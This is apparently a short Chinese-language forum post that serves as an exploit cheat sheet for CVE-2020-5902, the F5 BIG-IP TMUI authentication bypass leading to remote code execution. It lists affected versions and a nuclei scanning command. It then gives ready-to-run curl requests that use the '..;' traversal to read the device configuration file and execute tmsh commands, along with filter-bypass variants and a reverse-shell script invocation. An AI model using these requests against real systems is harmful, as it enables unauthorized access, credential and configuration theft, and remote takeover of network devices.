- 注册
- 09 10, 2024
- 消息
- 186
Java:
## 漏洞概述
认证绕过导致远程代码执行漏洞
攻击者可利用该漏洞执行任意的系统命令、创建或删除文件,关闭服务/执行任意的Java代码
## 影响范围
```http
BIG-IP 15.1.0
BIG-IP 14.1.0~14.1.2
BIG-IP 13.1.0~13.1.3
BIG-IP 12.1.0~12.1.5
BIG-IP 11.6.1~11.6.5
```
## POC
```http
nuclei -tags bigip -t cves/ -l urls.txt
Goby
```
## EXP
文件读取
```bash
curl -v -k "https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf"
```
RCE
```bash
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
```
Bypass
```
..; ==> /hsqldb;
..; ==> /hsqldb%0a
```
reverse shell:
```
./CVE-2020-5902.sh <server> <localip> <localport>
```
[@Budi Khoirudin](https://twitter.com/x4ce/status/1279790599793545216?s=21)
[@jas502n](https://github.com/jas502n/CVE-2020-5902)